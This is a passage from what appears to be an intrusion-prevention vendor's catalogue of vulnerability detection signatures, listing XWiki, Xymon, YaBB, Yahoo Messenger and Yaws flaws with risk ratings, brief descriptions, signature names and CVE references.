
A remote code execution vulnerability has been reported for XWiki. The vulnerability is due to improper escaping of the documentTree macro parameters. A remote attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation will result in remote code execution.

Situation:

HTTP_CSU-Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution

References:

CVE-2023-29509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29509

Xwiki.org-Xwiki-Registrationconfig-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org

Risk:

High

First detected in:

sgpkg-ips-1706-5242

Last changed:

sgpkg-ips-1706-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability has been reported for XWiki.org XWiki. The vulnerability is due to lack of input validation when handling user registration requests. A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted requests to the vulnerable server. Successful exploitation could result in arbitrary code execution in the security context of the application.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection
HTTP_CRL-Xwiki.org-Xwiki-Registrationconfig-Code-Injection-Suspected-Compromise

References:

CVE-2024-21650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21650

Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1612-5242

Last changed:

sgpkg-ips-1612-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Improper input validation in the SchedulerJobSheet component causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Schedulerjobsheet-Code-Injection

References:

CVE-2023-29524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29524

Xwiki.org-Xwiki-Searchadmin-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1694-5242

Last changed:

sgpkg-ips-1694-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability has been reported for XWiki.org XWiki. The vulnerability is due to a lack of input validation when when handling documents containing search user interface extensions. A remote, authenticated attacker can exploit this vulnerability by editing a document to contain an object with a maliciously crafted parameters. Successful exploitation could result in arbitrary code execution in the context of the application.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Searchadmin-Code-Injection

References:

CVE-2023-50721
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50721

Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1629-5242

Last changed:

sgpkg-ips-1629-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability have been reported in XWiKi. The vulnerability is due to improper input validation when rendering page name values. A remote, authenticated attacker can exploit this vulnerability by sending a request to the target server for a non-existent page with a crafted name. Successful exploitation could result in arbitrary code injection.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Skinscode.xwikiskinssheet-Code-Injection

References:

CVE-2023-37462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37462

Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

High

First detected in:

sgpkg-ips-1725-5242

Last changed:

sgpkg-ips-1725-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability has been reported for XWiki.org XWiki. This vulnerability is due to a lack of input validation when handling space titles. A remote, authenticated attacker can exploit this vulnerability by creating a document containing a maliciously crafted title on the target server. Successful exploitation could result in arbitrary code execution in the context of the application.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Solr-Space-Facet-Code-Injection

References:

CVE-2024-31984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31984

Xwiki.org-Xwiki-Tags-Code-Injection

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1519-5242

Last changed:

sgpkg-ips-1519-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Insufficient validation of tags in a request causes a code injection vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CSU-Xwiki.org-Xwiki-Tags-Code-Injection

References:

CVE-2022-36100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36100

Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection

About this vulnerability:

A vulnerability in XWiki.

Risk:

High

First detected in:

sgpkg-ips-1573-5242

Last changed:

sgpkg-ips-1573-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A vulnerability in XWiki, verions prior to 13.10.11, XWiki prior to 14.10, and XWiki prior to 14.4.7, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to insufficient validation of user data used in annotations.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-TextAreaClass-displayView-Code-Injection

References:

CVE-2023-26475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26475

Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection

About this vulnerability:

A vulnerability in XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

A code injection vulnerability has been reported for XWiki. The vulnerability is due to a lack of input validation when handling UIExtension objects. A remote, authenticated attacker can exploit this vulnerability by editing a document to contain an object with maliciously crafted parameters. Successful exploitation could result in arbitrary code execution in the context of the application.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-Uiextension-Wikiuiextensionparameters-Code-Injection

References:

CVE-2024-31997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31997

Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in XWiki.org XWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1648-5242

Last changed:

sgpkg-ips-1648-5242

Platform:

Generic

Software:

XWiki

Type:

Input Validation

Description:

Insufficient input validation when changing a user profile's time zone setting causes a cross-site scripting vulnerability in XWiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Xwiki.org-Xwiki-User-Profile-Stored-Cross-Site-Scripting

References:

CVE-2023-40176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40176

Xymon-Daemon-Gather-Information

About this vulnerability:

A vulnerability in Xymon Daemon.

Risk:

High

First detected in:

sgpkg-ips-1424-5242

Last changed:

sgpkg-ips-1424-5242

Platform:

Generic

Software:

Xymon

Type:

Insecure Configuration

Description:

A vulnerability in Xymon, versions before 4.3.25, which allows remote attackers to read arbitrary files in the configuration directory via a config command.

Situation:

Generic_CS-Xymon-Daemon-Gather-Information

References:

CVE-2016-2055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2055

Xymon-Useradm-Command-Execution

About this vulnerability:

A vulnerability in Xymon

Risk:

High

First detected in:

sgpkg-ips-1202-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix; Solaris; BSD

Software:

Xymon

Type:

Input Validation

Description:

A vulnerability in Xymon, versions before 4.3.25, which allows remote attackers to execute arbitrary code due to the insufficient validation of the USERNAME and PASSWORD parameters.

Situation:

HTTP_CSU-Xymon-Useradm-Command-Execution

References:

CVE-2016-2056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2056

YaBB-Cgi-Information-Retrieval

About this vulnerability:

A file disclosure vulnerability in YaBB

Risk:

Moderate

First detected in:

sgpkg-ips-618-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

YaBB Bulletin Board

Type:

Metacharacter Injection

Description:

There exists a file disclosure vulnerability in some versions of YaBB Bulletin Board software.

Situation:

HTTP_CSU-YaBB-Cgi-Information-Retrieval

References:

CVE-2000-0853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0853

BID-1668
http://www.securityfocus.com/bid/1668

OSVDB-411
http://www.osvdb.org/411

Yahoo!-Messenger-CYFT-ActiveX-Control-File-Download

About this vulnerability:

Arbitary file download vulnerability in Yahoo! Messenger

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

Yahoo Messenger

Type:

Malfunction

Description:

There is an absolute path vulnerability in Yahoo! Messenger ActiveX control. The vulnerability allows arbitary file download, allowing code execution in the context of the current user.

Situation:

HTTP_SS-Yahoo!-Messenger-CYFT-ActiveX-Control-File-Download

References:

CVE-2007-5017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5017

BID-25727
http://www.securityfocus.com/bid/25727

OSVDB-38296
http://www.osvdb.org/38296

Yahoo!-Messenger-File-Transfer-Filename-Spoofing

About this vulnerability:

A vulnerability in Yahoo! Messenger

Risk:

High

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Yahoo Messenger

Type:

Input Validation

Description:

There is a vulnerability in the way Yahoo! Messenger displays file names in the file transfer dialog. The product displays only a portion of an overly long filename. An attacker can exploit this flaw to mislead a user into downloading a malicious executable program. For example, from the truncated filename, a user may believe that he is receiving an image when in fact it is a program.

Situation:

Generic_SS-Yahoo!-Messenger-File-Transfer-Filename-Spoofing

References:

CVE-2005-0243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0243

BID-12587
http://www.securityfocus.com/bid/12587

Yahoo!-Messenger-Webcam-Upload-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability:

Stack buffer overflow vulnerability in Yahoo! Messenger

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Yahoo Messenger

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Yahoo! Messenger. The vulnerability can be exploited remotely to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_SS-Yahoo!-Messenger-YWcUpl.WcUpload-ActiveX-Control-Exploit
File-Text_Yahoo!-Messenger-YWcUpl.WcUpload-ActiveX-Control-Exploit

References:

CVE-2007-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3147

BID-24341
http://www.securityfocus.com/bid/24341

BID-24354
http://www.securityfocus.com/bid/24354

Yahoo!-Messenger-Webcam-Viewer-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability:

Stack buffer overflow vulnerability in Yahoo! Messenger

Risk:

High

First detected in:

sgpkg-ips-134-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Yahoo Messenger

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Yahoo! Messenger. The vulnerability can be exploited remotely to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_SS-Yahoo!-Messenger-YWcVwr.WcViewer-ActiveX-Control-Exploit
File-Text_Yahoo!-Messenger-YWcVwr.WcViewer-ActiveX-Control-Exploit

References:

CVE-2007-3148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3148

BID-24341
http://www.securityfocus.com/bid/24341

BID-24355
http://www.securityfocus.com/bid/24355

OSVDB-37081
http://www.osvdb.org/37081

Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability:

Multiple buffer overflow vulnerabilities in Yahoo! Messenger

Risk:

High

First detected in:

sgpkg-ips-134-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Yahoo Messenger

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in an ActiveX control included in Yahoo! Messenger. This may lead to code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows
File-Text_Yahoo!-Messenger-YVerInf-ActiveX-Control-Buffer-Overflows

References:

CVE-2007-4515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4515

BID-25494
http://www.securityfocus.com/bid/25494

OSVDB-37739
http://www.osvdb.org/37739

Yahoo!-Widgets-YDP-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Yahoo! Widgets

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

Yahoo! Widgets

Type:

Buffer Overflow

Description:

Yahoo! Widgets has a buffer overflow vulnerability in the YDPCTL.YDPControl ActiveX control due to a boundary error when processing the GetComponentVersion method. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.

Situation:

HTTP_SS-Yahoo!-Widgets-YDP-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-4034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4034

BID-25086
http://www.securityfocus.com/bid/25086

OSVDB-37705
http://www.osvdb.org/37705

Yahoo-Instant-Messenger-Network-Usage

About this vulnerability:	Yahoo instant messenger network usage
Risk:	Moderate
First detected in:	sgpkg-ips-21-1210
Last changed:	sgpkg-ips-1555-5242
Platform:	Generic
Software:	Yahoo Messenger
Type:	Instant Messenger
Description:	Yahoo Messenger is an instant messenger that can be used to send messages and share files among users.

Yahoo-Messenger-ActiveX-Control-Command-Execution

About this vulnerability:	A code execution vulnerability in Yahoo Messenger WScript.Shell ActiveX control
Risk:	High
First detected in:	sgpkg-ips-325-4219
Last changed:	sgpkg-ips-1555-5242
Platform:	Windows
Software:	Yahoo Messenger
Type:	Malfunction
Description:	There is a remote code execution vulnerability in Yahoo Messenger WScript.Shell ActiveX control. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation:	HTTP_SS-Yahoo-Messenger-ActiveX-Control-Command-Execution

Yahoo-WebMessenger-Usage

About this vulnerability:	Yahoo WebMessenger usage
Risk:	Moderate
First detected in:	sgpkg-ips-128-2032
Last changed:	sgpkg-ips-1555-5242
Platform:	Generic
Software:	Yahoo Messenger
Type:	Instant Messenger
Description:	Yahoo WebMessenger is a web service which allows users to connect to other Yahoo Messenger users through a web interface.

Yaws-Web-Server-Directory-Traversal

About this vulnerability:

A Yaws Web Server Directory Traversal vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Yaws Web Server

Type:

Directory Traversal

Description:

A vulnerability in Yaws Web Server which allows remote attackers to read arbitrary files via directory traversal.

Situation: